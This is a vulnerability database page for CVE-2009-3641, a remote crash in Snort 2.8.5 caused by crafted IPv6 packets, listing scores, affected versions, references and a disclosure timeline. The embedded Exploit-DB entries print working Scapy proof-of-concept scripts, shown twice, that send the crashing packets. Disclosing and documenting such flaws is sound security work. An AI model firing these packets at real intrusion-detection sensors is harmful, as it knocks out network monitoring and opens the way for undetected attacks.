CVE-2009-3641 : Detail

CVE-2009-3641

7.97%V3
Network
2009-10-28
13h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33306

Publication date : 2009-10-21 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes

source: https://www.securityfocus.com/bid/36795/info Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets. Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions. These issues affect Snort 2.8.5; other versions may also be vulnerable. You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip) 1) #only works on x86 #/usr/bin/env python from scapy.all import * u = "\x92"+"\x02" * 6 send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP 2) # works x86,x64 #/usr/bin/env python from scapy.all import * z = "Q" * 30 send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
Exploit Database EDB-ID : 9969

Publication date : 2009-10-22 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes

============================================= - Date: October 22th, 2009 - Discovered by: Laurent Gaffi&#65533; - Severity: Low ============================================= I. VULNERABILITY ------------------------- Snort <= 2.8.5 IPV6 Remote DoS II. DESCRIPTION ------------------------- A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6 crafted packet To trigger theses bugs you need to have compiled snort with the --enable-ipv6 option, and run it in verbose mode (-v) III. PROOF OF CONCEPT ------------------------- You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip) 1) #only works on x86 #/usr/bin/env python from scapy.all import * u = "\x92"+"\x02" * 6 send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP 2) # works x86,x64 #/usr/bin/env python from scapy.all import * z = "Q" * 30 send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6) IV. SYSTEMS AFFECTED ------------------------- Theses proof of concept as been tested on snort: - 2.8.5 V. NOT AFFECTED ------------------------- Sourcefire 3D Sensor VI. SOLUTION ------------------------- A new version correcting theses issues as been released (2.8.5.1) : http://www.snort.org/downloads VII. REFERENCES ------------------------- http://www.snort.org/ http://vrt-sourcefire.blogspot.com/ VIII. REVISION HISTORY ------------------------- October 14th, 2009: First issue discovered, advisory send to snort team. October 14th, 2009: Snort security team confirm the bug. October 16th, 2009: Second issue discovered, advisory send to snort team. October 20th, 2009: Snort security team confirm the bug. October 22th, 2009: Snort team released a new version. IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffi&#65533; Laurent.gaffie{remove-this}(at)gmail.com

Products Mentioned

Configuraton 0

Snort>>Snort >> Version To (including) 2.8.3.5

Snort>>Snort >> Version 1.6

Snort>>Snort >> Version 1.8.0

Snort>>Snort >> Version 1.8.1

Snort>>Snort >> Version 1.8.2

Snort>>Snort >> Version 1.8.3

Snort>>Snort >> Version 1.8.4

Snort>>Snort >> Version 1.8.5

Snort>>Snort >> Version 1.8.6

Snort>>Snort >> Version 1.8.7

Snort>>Snort >> Version 1.9.0

Snort>>Snort >> Version 1.9.1

Snort>>Snort >> Version 2.0

Snort>>Snort >> Version 2.0

Snort>>Snort >> Version 2.6.1

Snort>>Snort >> Version 2.6.1.1

Snort>>Snort >> Version 2.6.1.2

Snort>>Snort >> Version 2.6.2

Snort>>Snort >> Version 2.7_beta1

Snort>>Snort >> Version 2.8.0

    Snort>>Snort >> Version 2.8.2.2

      Snort>>Snort >> Version 2.8.3

        Snort>>Snort >> Version 2.8.3.1

          Snort>>Snort >> Version 2.8.3.2

            Snort>>Snort >> Version 2.8.3.4

              Snort>>Snort >> Version 2.8.3.4.1

                References

                http://www.osvdb.org/59159
                Tags : vdb-entry, x_refsource_OSVDB
                http://www.securityfocus.com/bid/36795
                Tags : vdb-entry, x_refsource_BID
                http://securitytracker.com/id?1023076
                Tags : vdb-entry, x_refsource_SECTRACK
                http://secunia.com/advisories/37135
                Tags : third-party-advisory, x_refsource_SECUNIA
                http://marc.info/?l=oss-security&m=125649553414700&w=2
                Tags : mailing-list, x_refsource_MLIST
                http://www.vupen.com/english/advisories/2009/3014
                Tags : vdb-entry, x_refsource_VUPEN
                http://www.openwall.com/lists/oss-security/2009/10/25/5
                Tags : mailing-list, x_refsource_MLIST
                http://seclists.org/fulldisclosure/2009/Oct/299
                Tags : mailing-list, x_refsource_FULLDISC